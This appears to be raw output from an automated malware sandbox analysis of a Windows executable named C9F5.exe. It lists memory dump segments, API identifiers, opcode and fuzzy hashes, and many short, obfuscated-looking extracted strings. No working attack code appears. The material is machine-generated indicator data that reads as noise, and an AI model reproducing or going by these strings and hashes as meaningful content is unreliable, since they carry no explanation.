                                                control_flow_graph 1751 7ff7d50c2f40-7ff7d50c2f52 1752 7ff7d50c2f74-7ff7d50c2f7a 1751->1752 1753 7ff7d50c2f60-7ff7d50c2f6f GetFileAttributesA 1752->1753 1754 7ff7d50c2f7c-7ff7d50c2f82 1752->1754 1753->1752 1754->1752 1755 7ff7d50c2f84-7ff7d50c2f94 1754->1755
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 452bfae53dbd5d28a0a72784fe65045ccb12d72f2076b1765e59c366cec007b5
                                                • Instruction ID: f238445c64d6cf803b0b08c206fef2ae104e280971cd0df2c267152f565cdbe4
                                                • Opcode Fuzzy Hash: 452bfae53dbd5d28a0a72784fe65045ccb12d72f2076b1765e59c366cec007b5
                                                • Instruction Fuzzy Hash: 22E0D80691D29683E5381235205107DAB615F97B54FE80336EAEE51AD4CA0DCA575A14
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ~{$2>"$2>"$Pw3$Pw3$Pw3$~{$~{$)OqW$*OqW$*OqW$+CB$+CB$6j]U$6j]U$I"l[$J"l[$J"l[$e@~$f@~$f@~$n,9T$n^ m$n^ m$o,9T$o,9T$xYjl$xYjl$zB/$zB/$zB/$()m$()m$XdU$XdU
                                                • API String ID: 0-2338440668
                                                • Opcode ID: 6da7570d03c9cdaee5e625def39a03de1a98c453bee8f8427bb1ebcd0885f883
                                                • Instruction ID: 81243b94b84714cf43cf9aff950b19e464b3bd7442829f7f3f92a1f6ecf932fc
                                                • Opcode Fuzzy Hash: 6da7570d03c9cdaee5e625def39a03de1a98c453bee8f8427bb1ebcd0885f883
                                                • Instruction Fuzzy Hash: 3293C736A0C7C587EA759B28A6903BEB391EB94B80FD04537DE8DC7794CE6CD4408B61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -gq|$-gq|$-gq|$0Ki$0Ki$1\Vg$1\Vg$E<i$E<i$J}m$J}m$O\V$O\V$^\~H$_\~H$_\~H$iH>l$jH>l$jH>l$lRE0$lRE0$sS.$tS.$tS.$z>J$z>J$z>J$fC$fC
                                                • API String ID: 0-1980736421
                                                • Opcode ID: e6e0f91390640d63ce615629dce2d8d2f95daeff08d0a49a14c75d8e99035874
                                                • Instruction ID: 9b840359a8a4b5e7c2b173d8610146f2f9fa4534f334a05fb92ee5675d369ed3
                                                • Opcode Fuzzy Hash: e6e0f91390640d63ce615629dce2d8d2f95daeff08d0a49a14c75d8e99035874
                                                • Instruction Fuzzy Hash: A973EC26A08BC68BDB785F3998903FD6391EB44B48FD4053BCE5E4BB98CF299540CB51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ']u$(]u$(]u$7\q $8\q $8\q $;3RB$<3RB$<3RB$G#p$G#p$Mc^m$Nc^m$Nc^m$Wc,$Wc,$X~wo$X~wo$a[`S$b[`S$b[`S$k=5$k=5$kwEb$kwEb$td8$ud8$ud8$DcW$DcW
                                                • API String ID: 0-67992731
                                                • Opcode ID: 84ba4c9e7151121fdfedf0e837e7828cc7c9bd50e2ba62bf12cd27050a02de91
                                                • Instruction ID: 5f75acbfc8908f41920535f2ad7596bf5dac2928d5577358b77f7c33be4e218c
                                                • Opcode Fuzzy Hash: 84ba4c9e7151121fdfedf0e837e7828cc7c9bd50e2ba62bf12cd27050a02de91
                                                • Instruction Fuzzy Hash: 5003D936A0C58287EAB49A38A0807BEE7D09B55B90FE40537DDDDC77D4CE2CE9418B61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: D_oq$E_oq$E_oq$SKp/$TKp/$TKp/$^t.+$^t.+$|1U$|1U$P$$P$$P$$P$$_P"$_P"
                                                • API String ID: 0-202705158
                                                • Opcode ID: 5ae6cf0d20ebf4617df430b177d3a2d887465d54666ff657e073a06b436cc771
                                                • Instruction ID: 578874d3243fc036eb92a790c7645b5e3fd715261c17054adb9d9c689d62081a
                                                • Opcode Fuzzy Hash: 5ae6cf0d20ebf4617df430b177d3a2d887465d54666ff657e073a06b436cc771
                                                • Instruction Fuzzy Hash: 2D23C826A15BC98BDB789F35D8942FD63A0EF49B84FE04137DE1E1BB64CE3896418311
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "2ZB$"2ZB$;#%$;#%$;,y3$;,y3$;,y3$;<b$<<b$<<b$<<b$<<b$@MC$@r#X$AMC$AMC$Ar#X$Ar#X$QRd`$RRd`$RRd`$s|x2$s|x2
                                                • API String ID: 0-4187098220
                                                • Opcode ID: a3beb7743ee411619cbc84fe7a547004e476f0c5cac0f5f1b6fbfb7994ea97ea
                                                • Instruction ID: c34df515e8d72180b872194e50cfc9ef6ae6bcb8a13ed5ce2140a2b735a51154
                                                • Opcode Fuzzy Hash: a3beb7743ee411619cbc84fe7a547004e476f0c5cac0f5f1b6fbfb7994ea97ea
                                                • Instruction Fuzzy Hash: F7F29A36A0C68687EA747629A484E7EEBD0EB84B54FD01633ED4DC7799CF2CE4408B51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: F~_$F~_$F~_$F~_$3_0$3_0$3_0$3_0$6$7$7$gkp.$gkp.$lUHm$lUHm$bU$bU$bU$y,P$y,P$y,P
                                                • API String ID: 0-4281497918
                                                • Opcode ID: 79e8a728e5764ced7f44b7ad5268e7822cd8efb54ea51e83ab8389648d4d7b48
                                                • Instruction ID: 947a7593b9e69217b43937835ba3a6a756237ce40c3a4d44854aa2bc8f03cada
                                                • Opcode Fuzzy Hash: 79e8a728e5764ced7f44b7ad5268e7822cd8efb54ea51e83ab8389648d4d7b48
                                                • Instruction Fuzzy Hash: 88F29437F0C1D287D6746B257540EBEE794E764B98F850623CE9923F98CA3CAD408B91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !k5$"k5$"k5$"k5$"k5$GSM-$HSM-$HSM-$V}M$V}M$V}M$|k+$}k+$}k+$~0%)$~0%)$q\z$q\z$q\z$q\z$q\z
                                                • API String ID: 0-2622637242
                                                • Opcode ID: 23c035e364f866626612a08a79a8392bf26121028d3385ea37c6c98ee372165f
                                                • Instruction ID: 5a53b64226593a12c82de85f1428bb2ba7af1396abb6d35abff53930ddddec16
                                                • Opcode Fuzzy Hash: 23c035e364f866626612a08a79a8392bf26121028d3385ea37c6c98ee372165f
                                                • Instruction Fuzzy Hash: 1982B82DF0C78587EA749629A19427EF291EB48B61FD88133DE9D8779CCE2CD4408F91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %G1$&G1$&G1$((LY$((LY$79|E$79|E$WkZ$XkZ$XkZ$n;_k$n;_k$sM|x$tM|x$tM|x$tM|x$tM|x$&My$&My$&My
                                                • API String ID: 0-1474312542
                                                • Opcode ID: 7e42e376913bd7cf51507d1b9cd3d36dc8f8f9cfee5041506468feac7d8b8f00
                                                • Instruction ID: a9a1907a26b5d91f7bfd1ee4da055cbf09f30e1769b830890792b16a938d2988
                                                • Opcode Fuzzy Hash: 7e42e376913bd7cf51507d1b9cd3d36dc8f8f9cfee5041506468feac7d8b8f00
                                                • Instruction Fuzzy Hash: EAD2C836B4C786CBEB746E7998802FD6290EB19B54FE04637DE0DCB794CE29D9908311
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6;ti$@{9s$A{9s$A{9s$A{9s$A{9s$Cs6$Cs6$VFL($VFL($iyku$jyku$jyku$w"a$x"a$x"a$a[$a[$a[
                                                • API String ID: 0-3286678768
                                                • Opcode ID: e9a0b6bf3d01fc20507b5053a27a964f9a557d6c6714163e7e5dde813e8cfd6f
                                                • Instruction ID: 93cdaec6f6f7de7300a428dcd25c184c7619327020e4d33873aa94c90687ca77
                                                • Opcode Fuzzy Hash: e9a0b6bf3d01fc20507b5053a27a964f9a557d6c6714163e7e5dde813e8cfd6f
                                                • Instruction Fuzzy Hash: 9833EB36B0C78587EE789635A09127EE391EF84B90FD0023BDE9E47B98DE2DD5408B51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (M$(M$);.0N^s$J]M+$J]M+$\7Zs$]7Zs$]7Zs$dn$dn$yN7w$zN7w$zN7w$zN7w$q}'$q}'$q}'$q}'$q}'
                                                • API String ID: 0-43781059
                                                Similarity
                                                • API ID:
                                                • String ID: .!)5$.!)5$Rs<i$Rs<i$TQm*$UQm*$UQm*$UQm*$hF{h$iF{h$iF{h$iF{h$unordered_map/set too long$~ec$~ec$~ec$~ec$~ec
                                                • API String ID: 0-1542828796
                                                Similarity
                                                • API ID:
                                                • String ID: 9sJZ$9sJZ$>(q$>(q$>(q$>(q${bC$|bC$|bC$Ap1$Ap1$h,]$h,]$/$/
                                                • API String ID: 0-1954784225
                                                Similarity
                                                • API ID:
                                                • String ID: -DR$-DR$-g-$.g-$.g-$NJ"$OJ"$OJ"$j.um$k.um$k.um$;'J$;'J$;'J$;'J
                                                • API String ID: 0-3506230456
                                                Similarity
                                                • API ID:
                                                • String ID: ]_v$]_v$]_v$]_v$[f'$\f'$\f'$t?^$t?^$0s$0s$0s$1Uj$1Uj
                                                • API String ID: 0-4198073719
                                                Similarity
                                                • API ID:
                                                • String ID: )q$*q$*q$?c$?c$PF&+$PF&+$WKn'$XKn'$XKn'$a<i$b<i$b<i
                                                • API String ID: 0-253853581
                                                Similarity
                                                • API ID:
                                                • String ID: 0we$1we$1we$1we$3u`m$4u`m$4u`m$4u`m$4u`m$QMea$QMea$kxgK$kxgK
                                                • API String ID: 0-554904181
                                                Similarity
                                                • API ID:
                                                • String ID: C\!N$C\!N$Tm].$Tm].$Z]N$Z]N$Z$Z$vector too long$yXF$zXF$zXF
                                                • API String ID: 0-2263072351
                                                Similarity
                                                • API ID:
                                                • String ID: ,)W$-)W$-)W$Liz $Miz $Miz $iq*$iq*$iq*
                                                • API String ID: 0-548768203
                                                Similarity
                                                • API ID:
                                                • String ID: !cH$!cH$invalid hash bucket count$n.P'$n.P'$tcD$tcD$~hP$~hP
                                                • API String ID: 0-2997982297
                                                Similarity
                                                • API ID:
                                                • String ID: h1$h1$(qk$)qk$)qk$,VT$,VT$bGI$bGI
                                                • API String ID: 0-3994866152
                                                Similarity
                                                • API ID:
                                                • String ID: ) )~$) )~$*TZ%$*TZ%$7ZX$7ZX$_^|$_^|$_^|
                                                • API String ID: 0-1291360158
                                                Similarity
                                                • API ID:
                                                • String ID: "($"($@N[$@N[$@N[$@N[$CEj'$DEj'$DEj'
                                                • API String ID: 0-2996620231
                                                Similarity
                                                • API ID:
                                                • String ID: bS$2s$2s$2s$2s$_.K*$`.K*$`.K*
                                                • API String ID: 0-1048334069
                                                Similarity
                                                • API ID:
                                                • String ID: ,wJ[$-wJ[$-wJ[$Qz%a$Qz%a$S; 9$S; 9$|O
                                                • API String ID: 0-1154477612
                                                Similarity
                                                • API ID:
                                                • String ID: &(m$&(m$A6M$A6M$A6M$s^yY$t^yY$t^yY
                                                • API String ID: 0-425518891
                                                Similarity
                                                • API ID:
                                                • String ID: (W,$(W,$(W,$Wq.F$Wq.F$zZ-$zZ-
                                                • API String ID: 0-1973832573
                                                Similarity
                                                • API ID:
                                                • String ID: uLh$ uLh$ uLh$[t!:$[t!:$[t!:$[t!:
                                                • API String ID: 0-874898717
                                                Similarity
                                                • API ID:
                                                • String ID: A)an$B)an$B)an$R>t0$R>t0$h @m$h @m
                                                • API String ID: 0-2014293124
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 9fO$m~MK$m~MK$Tv$Tv$Tv
                                                • API String ID: 0-219908125
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: M"$M"$M"$eN'$fN'$fN'
                                                • API String ID: 0-299084768
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DV$C:\Users\user\AppData\Local\Temp\C9F5.exe$jsx6$ksx6$ksx6
                                                • API String ID: 0-1762011659
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5n!$5n!$uc[$vc[$vc[
                                                • API String ID: 0-468549941
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5nki$5nki$:A?h$;A?h$;A?h
                                                • API String ID: 0-3808611175
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ]t{$]t{
                                                • API String ID: 0-2389501032
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: wnZ:$wnZ:$wtx^$wtx^
                                                • API String ID: 0-3875597248
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *FN$W}:!$[[\
                                                • API String ID: 0-977268304
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: W!$W!
                                                • API String ID: 0-695975270
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: FA2$FA2$PG<;$PG<;
                                                • API String ID: 2738559852-1104478874
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: aCo2$aCo2$/~$/~
                                                • API String ID: 0-3304968679